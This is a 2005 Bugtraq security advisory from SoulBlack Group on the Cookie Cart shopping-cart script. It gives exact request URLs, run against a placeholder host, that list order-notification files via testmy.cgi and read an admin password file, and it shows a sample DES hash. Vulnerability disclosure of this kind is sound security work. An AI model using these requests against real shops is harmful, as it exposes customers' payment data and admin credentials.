[38944] in bugtraq
Cookie Cart Default Installation Multiple Vulnerabilities
daemon@ATHENA.MIT.EDU (SoulBlack Group)
Mon May 23 12:52:52 2005
Message-ID: <bf9e91160505211615159cbcd@mail.gmail.com>
Date: Sat, 21 May 2005 20:15:48 -0300
From: SoulBlack Group <soulblacktm@gmail.com>
Reply-To: SoulBlack Group <soulblacktm@gmail.com>
To: full-disclosure@lists.grok.org.uk, bugtraq@securityfocus.com,
news@securiteam.com, sec@soulblack.com.ar, bugs@securitytracker.com,
submissions@packetstormsecurity.org, vuln@secunia.com,
alerts_advisories@net-security.org
Mime-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
============================================================
============================================================
Title: Cookie Cart Default Installation Multiple Vulnerabilities
Vendor: http://www.metromkt.net/ccart
Vulnerability discovery: SoulBlack - Security Research -
http://soulblack.com.ar
Date: 21/05/2005
Severity: Medium. Remote users can obtain several data of Credits Cards, etc.
Affected version: Unknow
============================================================
============================================================
* Summary *
Cookie Cart Shopping is a Simple E-Shop Commerce.
-------------------------------------------------------------
* Problem Description *
Remote user can obtain Admin password and see Confidential (asi se
escribe ??) Information
-------------------------------------------------------------
* First Vulnerability *
You can see "Order Notification" list with testmy.cgi and testmy.pl
http://www.vulnerable.com/cart/cgi/testmy.cgi?testmycgi=/cart/cgi/testmy.cgi&path=/cart/dbase_ven/&run=yes
http://www.vulnerable.com/cart/dbase_ven/[vendor_#number-notification.txt]
Example:
http://www.vulnerable.com/cart/dbase_ven/vendor_10112088.txt
* Second Vulnerability *
You can read Password File (DES Encryption)
http://www.vulnerable.com/cart/data/passwd.txt
Example:
admin:aeczIj3e6GLso
-------------------------------------------------------------
* Fix *
Use .htaccess or contact Vendor.
-------------------------------------------------------------
* References *
http://www.soulblack.com.ar/repo/papers/cookiec_advisory.txt
-------------------------------------------------------------
* Credits *
Vulnerability reported by SoulBlack Security Research
============================================================
--
SoulBlack - Security Research
http://www.soulblack.com.ar
